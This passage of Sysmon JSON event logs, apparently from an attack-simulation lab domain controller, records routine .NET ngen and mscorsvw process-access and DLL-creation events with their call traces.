c|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.732\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.732","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001048260B00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.732\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.732","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001048260B00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:22.732\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:22.732","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001048260B00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:22.997\r\nProcessGuid: {E2A3D6B1-1342-5F25-0000-001005B20D00}\r\nProcessId: 4288\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10c0-0\\PresentationFramework.Royale.dll\r\nCreationUtcTime: 2020-08-01 07:01:22.997","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:22.997","ProcessGuid":"{E2A3D6B1-1342-5F25-0000-001005B20D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10c0-0\\PresentationFramework.Royale.dll","CreationUtcTime":"2020-08-01 07:01:22.997","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.028\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010E3300C00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:23.028","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010E3300C00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.028\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010E3300C00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:23.028","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010E3300C00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.044\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1343-5F25-0000-0010D1B60D00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:23.044","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1343-5F25-0000-0010D1B60D00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.185\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001074D50A00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:23.185","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001074D50A00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.185\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001074D50A00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 